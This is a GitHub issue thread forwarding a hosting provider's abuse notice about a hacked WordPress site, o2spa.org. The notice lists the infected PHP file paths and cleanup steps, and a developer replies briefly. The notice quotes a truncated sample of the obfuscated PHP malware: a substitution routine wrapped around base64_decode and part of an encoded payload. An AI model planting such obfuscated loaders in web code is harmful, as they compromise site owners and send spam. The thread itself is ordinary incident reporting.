### ISSUE TITLE
Mail from Crazy Domain

### ISSUE THREAD

**Issue by adnan1111** [adnan1111/o2spaorg#56]
Hello Arish,

We got a mail from crazydomain regarding malicious content on o2spa.org. Below is the mail

Regards
Prasad

Mon G (Crazy Domains)
9 May 5:36 pm

Hello Adnan,

Good day.

We found out that the website o2spa.org was hacked and breached the Terms of Service.

Sample hacked file(s):

/home/ospaorg/public_html/wp/wp-includes/SimplePie/Parse/menu53.php
/home/ospaorg/public_html/animation_landingpage/model50.php

Solution:

The file(s) listed contain malicious code and must be cleaned up/removed to prevent SPAM send.
Site administrator password and DB(s) user password must be changed.
Site administrator must check DB(s) for admin records.
Sample content:

<?php
function otenx($p, $gvamjpac){$wgufxfcnu = ''; for($i=0; $i < strlen($p); $i++){$wgufxfcnu .= isset($gvamjpac[$p[$i]]) ? $gvamjpac[$p[$i]] : $p[$i];}
$hc="base64_decode";return $hc($wgufxfcnu);}
$gxvjgqpxvb = 'TtD9O3jqFPTgfN3eM1jePN2HFeMZKim3UicLRcLsOAmLPSEDBI6u7tjuPN3eM1jeMeMZKxsLRcLsOAmL'.
'PSEDBI6u7AylPN3lFAEJBtDH7DjhOAJDfec6pIakIadqFPQoBtDYF3jZOAJLBI6'.
'cWUZWI1D1WtDqMN3hWIQo5h3w3a3wWwaWVcgffyjUQ3fAQ3f7fJdK5yj'.
'UQ52tfJh6GwszXeKkKsgffyjUQ3fAQ3f7fJfyU5j5Q3jdQiQwfJh6GwszpUKSXCs9pIl'.
'2KCZWIAD1WIyD7PdhVw6aPJEy5DFy5DZuwyQ55yjnPhFG5DBd5aQyQyjtUJKuPwaLI6DkI6af'.
'fyjUQ3fAQ3f7fhb53ydoAyjtUJfPT3fiQ5QoQajwfJh6GwszpUKSXCs9pIl2KCZWIPhWoTLLFzbLMS'.
'EDBI6aPhFfUi3UWwaWVcgfF1jeFAyCOI6aPhFfUi3UKtyqKIQ0FPa6GUl6ftFL7t5LI6DkI6afO'.

Terms of Service:

2.0 Acceptable use & general conduct

It is not acceptable to use our Service(s) for the following non-exhaustive examples and you irrevocably agree that you will not use our Service(s) to:

"Spam" or engage in "spamming" activities, or sending unsolicited commercial activities;
For more information and further assistance, please contact our friendly Customer Support team.

https://www.crazydomains.co.in/contact/

Thank you,
Mon G

**Comment by arish-ddeveloper** [comment]
Dear Prasad,

O2spa.org site is running from InMotion Hosting, the files in crazy domain are just left as they were hence we don't have anything to concerned about the files there.

Thanks & Regards
Arish
